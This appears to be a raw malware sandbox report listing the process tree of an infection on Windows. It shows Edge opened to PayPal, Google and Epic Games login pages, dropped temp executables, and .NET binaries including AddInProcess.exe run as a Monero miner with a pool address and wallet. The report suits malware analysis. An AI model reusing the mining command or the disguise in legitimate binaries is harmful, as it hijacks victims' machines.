"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,14565503530349296244,9457041934507978451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,14565503530349296244,9457041934507978451,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,18104348865823607404,16122096743738874223,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,18104348865823607404,16122096743738874223,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,11867663414940510949,1377431933541226581,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4705565606754705193,9095001987317197097,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 512 -ip 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\EDEB.exe

C:\Users\Admin\AppData\Local\Temp\EDEB.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe

C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50

Network


Files


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 933dc6d5d258580b62e4b6a6e43ac779
SHA1 de09ae9415d52b305e564902b7f087fb0c5a47dc
SHA256 1a07adcde6bb3d84417580022eeeaf444568ecb8e878e886d06c70339004c036
SHA512 48687536155c47668a453950620d63154dd39b0dae1a9a24d63f3c0188a39bafa60b750e9b1e11ab5cda95a29353e172fdb491afa428dae9ce7f7e266918f51e